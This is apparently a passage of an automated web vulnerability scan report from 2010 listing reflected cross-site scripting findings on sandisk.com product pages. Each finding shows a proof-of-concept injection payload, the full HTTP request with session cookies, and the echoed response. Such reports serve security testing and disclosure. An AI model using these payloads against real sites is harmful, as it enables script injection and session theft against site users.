3.171. http://www.sandisk.com/products/mobile-memory-products/sandisk-microsdhc.aspx

3.172. http://www.sandisk.com/products/mobile-memory-products/sandisk-mobile-ultra-microsd-microsdhc

3.173. http://www.sandisk.com/products/mobile-memory-products/sandisk-mobilemate-micro-reader.aspx

3.174. http://www.sandisk.com/products/netbook-cards/sandisk-netbook-sdhc-memory-card

3.175. http://www.sandisk.com/products/readers-accessories

3.176. http://www.sandisk.com/products/readers-accessories/large-memory-card-case

3.177. http://www.sandisk.com/products/readers-accessories/micromate-sdhc

3.178. http://www.sandisk.com/products/readers-accessories/sandisk-extreme-20-usb-readers

3.179. http://www.sandisk.com/products/readers-accessories/sandisk-extreme-firewire-reader

3.180. http://www.sandisk.com/products/readers-accessories/sandisk-extreme-pro-expresscard-adapter

3.181. http://www.sandisk.com/products/readers-accessories/sandisk-imagemate-all-in-one-usb-20-reader

3.182. http://www.sandisk.com/products/readers-accessories/sandisk-imagemate-multi-card-usb-20-reader

3.183. http://www.sandisk.com/products/readers-accessories/sandisk®-mobilemate?-duo

3.184. http://www.sandisk.com/products/sansa-music-and-video-players/sandisk-sansa-clipplus-mp3-player

3.185. http://www.sandisk.com/products/slotradioproducts/sansaplayers-cards/card-vh1-classic

3.186. http://www.sandisk.com/sandisk-rss

3.187. http://www.sandisk.com/sandisk-rss.aspx

3.188. http://www.sandisk.com/sandisk-support/contact-us

3.189. http://www.sandisk.com/sandisk-support/driver-download-wizard

3.190. http://www.sandisk.com/sandisk-support/where-to-buy

3.191. http://www.sandisk.com/sitemap

4. HTML does not specify charset

4.1. http://www.sandisk.com/microsites/OnlineExclusive/index.html

4.2. http://www.sandisk.com/writereview.htm



1. Cross-site scripting (reflected)  next
There are 34 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.sandisk.com/products/camcorder/sandisk-extreme-hd-video-sdhc-cards [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/camcorder/sandisk-extreme-hd-video-sdhc-cards

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd5f5"style%3d"x%3aexpression(alert(1))"eef9f69184a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fd5f5"style="x:expression(alert(1))"eef9f69184a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/camcorder/sandisk-extreme-hd-video-sdhc-cards?fd5f5"style%3d"x%3aexpression(alert(1))"eef9f69184a=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 31491
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:46:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/camcorder/sandisk-extreme-hd-video-sdhc-cards?fd5f5"style="x:expression(alert(1))"eef9f69184a=1?tab=review">
...[SNIP]...

1.2. http://www.sandisk.com/products/camcorder/sandisk-video-hd-sdhc [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/camcorder/sandisk-video-hd-sdhc

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f513a"style%3d"x%3aexpression(alert(1))"a5e6149afe5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f513a"style="x:expression(alert(1))"a5e6149afe5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/camcorder/sandisk-video-hd-sdhc?f513a"style%3d"x%3aexpression(alert(1))"a5e6149afe5=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 30609
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:46:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/camcorder/sandisk-video-hd-sdhc?f513a"style="x:expression(alert(1))"a5e6149afe5=1?tab=review">
...[SNIP]...

1.3. http://www.sandisk.com/products/computing-products/sandisk-cruzer-blade-usb-flash-drive [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/computing-products/sandisk-cruzer-blade-usb-flash-drive

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1f21"style%3d"x%3aexpression(alert(1))"88ec6cb3187 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1f21"style="x:expression(alert(1))"88ec6cb3187 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/computing-products/sandisk-cruzer-blade-usb-flash-drive?b1f21"style%3d"x%3aexpression(alert(1))"88ec6cb3187=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 30910
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:46:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/computing-products/sandisk-cruzer-blade-usb-flash-drive?b1f21"style="x:expression(alert(1))"88ec6cb3187=1?tab=review">
...[SNIP]...

1.4. http://www.sandisk.com/products/computing-products/sandisk-solid-state-drive [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/computing-products/sandisk-solid-state-drive

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5318"style%3d"x%3aexpression(alert(1))"90dcaea1c6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5318"style="x:expression(alert(1))"90dcaea1c6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/computing-products/sandisk-solid-state-drive?e5318"style%3d"x%3aexpression(alert(1))"90dcaea1c6b=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 52921
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:45:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/computing-products/sandisk-solid-state-drive?e5318"style="x:expression(alert(1))"90dcaea1c6b=1?tab=review">
...[SNIP]...

1.5. http://www.sandisk.com/products/computing-products/sandisk-ultra-backup-usb-flash-drive [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/computing-products/sandisk-ultra-backup-usb-flash-drive

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce901"style%3d"x%3aexpression(alert(1))"55ab8ce19e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ce901"style="x:expression(alert(1))"55ab8ce19e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/computing-products/sandisk-ultra-backup-usb-flash-drive?ce901"style%3d"x%3aexpression(alert(1))"55ab8ce19e3=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 53892
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:46:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/computing-products/sandisk-ultra-backup-usb-flash-drive?ce901"style="x:expression(alert(1))"55ab8ce19e3=1?tab=review">
...[SNIP]...

1.6. http://www.sandisk.com/products/dslr/sandisk-extreme-compactflash-card [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/dslr/sandisk-extreme-compactflash-card

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4afb2"style%3d"x%3aexpression(alert(1))"4d88f248f5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4afb2"style="x:expression(alert(1))"4d88f248f5c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/dslr/sandisk-extreme-compactflash-card?4afb2"style%3d"x%3aexpression(alert(1))"4d88f248f5c=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33131
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:45:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/dslr/sandisk-extreme-compactflash-card?4afb2"style="x:expression(alert(1))"4d88f248f5c=1?tab=review">
...[SNIP]...

1.7. http://www.sandisk.com/products/dslr/sandisk-extreme-iv-compactflash [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/dslr/sandisk-extreme-iv-compactflash

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2325d"style%3d"x%3aexpression(alert(1))"b1252f74294 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2325d"style="x:expression(alert(1))"b1252f74294 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/dslr/sandisk-extreme-iv-compactflash?2325d"style%3d"x%3aexpression(alert(1))"b1252f74294=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 31929
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:45:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/dslr/sandisk-extreme-iv-compactflash?2325d"style="x:expression(alert(1))"b1252f74294=1?tab=review">
...[SNIP]...

1.8. http://www.sandisk.com/products/dslr/sandisk-extreme-pro-compactflash-card [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/dslr/sandisk-extreme-pro-compactflash-card

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13d2c"style%3d"x%3aexpression(alert(1))"6a479bce8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 13d2c"style="x:expression(alert(1))"6a479bce8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/dslr/sandisk-extreme-pro-compactflash-card?13d2c"style%3d"x%3aexpression(alert(1))"6a479bce8d=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33658
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:45:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/dslr/sandisk-extreme-pro-compactflash-card?13d2c"style="x:expression(alert(1))"6a479bce8d=1?tab=review">
...[SNIP]...

1.9. http://www.sandisk.com/products/dslr/sandisk-extreme-pro-compactflash-card.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/dslr/sandisk-extreme-pro-compactflash-card.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6d55"style%3d"x%3aexpression(alert(1))"8670393045b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c6d55"style="x:expression(alert(1))"8670393045b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/dslr/sandisk-extreme-pro-compactflash-card.aspx?c6d55"style%3d"x%3aexpression(alert(1))"8670393045b=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/press-room
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33670
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/dslr/sandisk-extreme-pro-compactflash-card.aspx?c6d55"style="x:expression(alert(1))"8670393045b=1?tab=review">
...[SNIP]...

1.10. http://www.sandisk.com/products/dslr/sandisk-extreme-sdhc-cards- [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/dslr/sandisk-extreme-sdhc-cards-

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d221"style%3d"x%3aexpression(alert(1))"d8dcded1d4d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d221"style="x:expression(alert(1))"d8dcded1d4d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/dslr/sandisk-extreme-sdhc-cards-?5d221"style%3d"x%3aexpression(alert(1))"d8dcded1d4d=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33305
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:46:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/dslr/sandisk-extreme-sdhc-cards-?5d221"style="x:expression(alert(1))"d8dcded1d4d=1?tab=review">
...[SNIP]...

1.11. http://www.sandisk.com/products/dslr/sandisk-ultra-compact-flash [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/dslr/sandisk-ultra-compact-flash

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8282e"style%3d"x%3aexpression(alert(1))"f95629108dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8282e"style="x:expression(alert(1))"f95629108dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/dslr/sandisk-ultra-compact-flash?8282e"style%3d"x%3aexpression(alert(1))"f95629108dc=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32839
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:45:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/dslr/sandisk-ultra-compact-flash?8282e"style="x:expression(alert(1))"f95629108dc=1?tab=review">
...[SNIP]...

1.12. http://www.sandisk.com/products/dslr/sandisk-ultra-ii-compactflash [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/dslr/sandisk-ultra-ii-compactflash

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f68c2"style%3d"x%3aexpression(alert(1))"c30b6badd95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f68c2"style="x:expression(alert(1))"c30b6badd95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/dslr/sandisk-ultra-ii-compactflash?f68c2"style%3d"x%3aexpression(alert(1))"c30b6badd95=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32727
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:44:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/dslr/sandisk-ultra-ii-compactflash?f68c2"style="x:expression(alert(1))"c30b6badd95=1?tab=review">
...[SNIP]...

1.13. http://www.sandisk.com/products/dslr/sandisk-ultra-sdhc [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/dslr/sandisk-ultra-sdhc

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 417ed"style%3d"x%3aexpression(alert(1))"28642bf6833 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 417ed"style="x:expression(alert(1))"28642bf6833 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/dslr/sandisk-ultra-sdhc?417ed"style%3d"x%3aexpression(alert(1))"28642bf6833=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 34306
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:45:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
